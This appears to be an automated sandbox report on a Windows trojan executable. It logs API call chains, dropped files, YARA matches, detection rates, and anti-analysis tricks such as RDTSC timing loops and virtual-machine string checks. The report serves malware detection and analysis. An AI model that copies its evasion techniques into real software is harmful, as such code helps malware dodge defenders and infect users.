      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_0040535C LdrInitializeThunk,GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,LdrInitializeThunk,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_0040535C
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,LdrInitializeThunk,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LdrInitializeThunk,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,LdrInitializeThunk,ExitWindowsEx,LdrInitializeThunk,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeFile created: C:\Windows\Arder.lnkJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_004069450_2_00406945
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_0040711C0_2_0040711C
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_742F1A980_2_742F1A98
      Source: SvmL9tW29w.exeStatic PE information: invalid certificate
      Source: SvmL9tW29w.exe, 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs SvmL9tW29w.exe
      Source: SvmL9tW29w.exe, 00000009.00000000.3516679199.0000000000458000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs SvmL9tW29w.exe
      Source: SvmL9tW29w.exeBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs SvmL9tW29w.exe
      Source: SvmL9tW29w.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal76.troj.evad.winEXE@3/8@2/2
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,LdrInitializeThunk,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LdrInitializeThunk,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,LdrInitializeThunk,ExitWindowsEx,LdrInitializeThunk,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,LdrInitializeThunk,SetDlgItemTextA,LdrInitializeThunk,0_2_0040460D
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_0040216B LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,0_2_0040216B
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeFile created: C:\Users\user\tranchetJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsi2170.tmpJump to behavior
      Source: SvmL9tW29w.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: SvmL9tW29w.exeReversingLabs: Detection: 75%
      Source: SvmL9tW29w.exeVirustotal: Detection: 76%
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeFile read: C:\Users\user\Desktop\SvmL9tW29w.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\SvmL9tW29w.exe "C:\Users\user\Desktop\SvmL9tW29w.exe"
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess created: C:\Users\user\Desktop\SvmL9tW29w.exe "C:\Users\user\Desktop\SvmL9tW29w.exe"
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess created: C:\Users\user\Desktop\SvmL9tW29w.exe "C:\Users\user\Desktop\SvmL9tW29w.exe"Jump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Arder.lnk.0.drLNK file: ..\Users\user\Disannex.And37
      Source: SvmL9tW29w.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: SvmL9tW29w.exe, 00000009.00000001.3517314416.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: mshtml.pdbUGP source: SvmL9tW29w.exe, 00000009.00000001.3517314416.0000000000649000.00000020.00000001.01000000.00000007.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000000.00000002.3747394738.0000000004831000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.3745241820.0000000003591000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_742F1A98 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,lstrcpyA,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryA,GetProcAddress,lstrlenA,0_2_742F1A98
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_742F2F60 push eax; ret 0_2_742F2F8E
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_0290E317 push edx; ret 0_2_0290E330
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_0290DB57 push ebp; iretd 0_2_0290DB5D
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_02910144 push cs; iretd 0_2_02910145
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 9_2_01670144 push cs; iretd 9_2_01670145
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 9_2_0166DB57 push ebp; iretd 9_2_0166DB5D
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 9_2_0166E317 push edx; ret 9_2_0166E330
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeFile created: C:\Users\user\AppData\Local\Temp\nsi2E71.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeAPI/Special instruction interceptor: Address: 48F72CD
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeAPI/Special instruction interceptor: Address: 36572CD
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeRDTSC instruction interceptor: First address: 48CFF18 second address: 48CFF18 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FD9D917AD36h 0x00000006 test eax, ecx 0x00000008 inc ebp 0x00000009 test al, bl 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeRDTSC instruction interceptor: First address: 362FF18 second address: 362FF18 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FD9D8D87DB6h 0x00000006 test eax, ecx 0x00000008 inc ebp 0x00000009 test al, bl 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi2E71.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\SvmL9tW29w.exe TID: 8024Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_004027A1 LdrInitializeThunk,FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,LdrInitializeThunk,FindNextFileA,FindClose,0_2_004058BF
      Source: SvmL9tW29w.exe, 00000009.00000002.3751806082.00000000062AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: SvmL9tW29w.exe, 00000009.00000002.3751806082.000000000627A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW `+
